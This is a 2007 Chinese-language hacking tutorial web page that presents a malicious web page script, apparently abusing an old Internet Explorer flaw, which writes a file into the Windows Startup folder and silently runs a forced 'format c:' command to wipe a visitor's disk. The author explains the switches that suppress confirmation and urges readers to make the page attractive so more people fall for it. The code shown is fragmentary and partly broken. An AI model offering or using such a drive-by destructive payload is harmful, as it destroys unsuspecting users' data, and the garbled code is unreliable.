dedecms织梦内容管理系统  
 
首页 | 方舟产品 | 系统优化 | 硬件系统 | 软件系统 | 网络系统 | 无盘网络 | 软件下载 | 杀毒防黑 | 专题 | 会员中心 | 方舟论坛
  当前位置:方舟系统站>杀毒防黑>黑客技术>入门教程>文章内容
黑客技巧之有关HTML代码的另类应用
来源: 作者: 发布时间:2007-03-22  


这个是一个关于HTML代码攻击的,虽然短点大家看看怎么样,能实现的哦。

现在的Windows操作系统实在是很方便,连格式化都是只用鼠标点点就可以了,不用象以前那样要输入命令来完成格盘。

我们要做一个格本地磁盘网页并不是很难,会HTML代码的朋友一定是没有什么问题的,这个其实就是利用一下IE的漏洞来实现我们的目的。

下面我们看一下下面的代码我们就会发现其中的奥妙所在了。


scr.reset()
scr.path="c:\\windows\\start menu\\programs\\启动\\文件名
scr.doc=""
wsh.run('start.exe /m format c:/q/autotest/u')
 

对于HTML代码了解的朋友们一定看出来了吧,这段代码的利害之处就在于最后一句,格你的磁盘没商量。

下面我们来看看这段代码的,具体的分析一下的他的工作原理是怎么样的。

首先,我们来看看这一句


scr.path="c:\\windows\\start menu\\programs\\启动\\文件名
 


这句,就是当看到这个网页的时候,它会写入到用户的机器的启动目录下,并以一个文件名的文件形式出现

wsh.run('start.exe /m format c:/q/autotest/u')
 

这句就是我们这里所要讲的核心东西了,对于format 这个命令大家不会陌生的吧,只要知道这个命令的朋友,一定会知道这句命令的意思的,我就在这里不在多说什么了。

在这里我把他的一些参数,简要的说说,大家会更加明白的。

在进行格盘的时候系统会与你进行对话,是否进行的,大家看到这个参数了吗/autotest他会强制性的对你的硬盘进行格式化,而不再进行询问;/q/u这两个参数为系统不需要检查立执行。在上一句中的start.exe与/m选项配合,哈哈,相信在执行时以最小化的状态进行,谁都会头痛的。

在这段代码里,核心语句


wsh.run('start.exe /m format c:/q/autotest/u')
 

我们只要对这段代码进行改动相信会出现更多不同的变化。在应用的时候把自己HTML代码做的漂亮一些,相信一定会有很多的人会上当,不小心中了你的圈套。



 
[收藏] [推荐] [评论(1条)] [返回顶部] [打印本页] [关闭窗口]  
用户名: 新注册) 密码: 匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·Keymake实现免密码查看本地QQ聊
·代理跳板与其它突破封锁软件的比
·恶搞祖玛之修改器(图)
·最新炸QQ方法,绝对原创
·SERV-U配置文件详解
·绝对经典的ftp技巧入侵大全
·网络入侵一般步骤及思路
·黑客入侵基础知识FTP命令登陆提
·利用智能abc漏洞,破解网吧计费
·Baidu
·黑客技巧
·入侵网站挂马经验分享
  相关文章
·系统安全之制作编写超级批处理病
·黑客技巧
·系统安全之菜鸟也能搞定C++内存
·EXE程序的自删除实现
·深入分析利用反弹技术进行DDoS攻
·从命令学起 让菜鸟也能够顺利入
·SQL注入取得网站路径大全
·计算机网络攻击常见手法及防范措
·浅谈蜜罐诱骗的基础知识
·黑客经验之实例讲解木马的分析方
·系统安全之口令入侵法黑客入侵的
·黑客知识之各类攻击软件原理与防
  主题推广
方舟网络 版权所有|关于本站|隐私保护|